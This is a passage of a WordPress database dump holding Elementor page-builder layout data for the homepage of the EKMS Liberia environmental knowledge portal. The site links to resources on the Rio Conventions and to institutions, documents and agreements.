center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19114,2797,'_elementor_version','2.7.5'),(19115,2797,'_elementor_template_type','wp-page'),(19116,2797,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19118,2798,'_wp_page_template','default'),(19119,2798,'_elementor_edit_mode','builder'),(19120,2798,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the 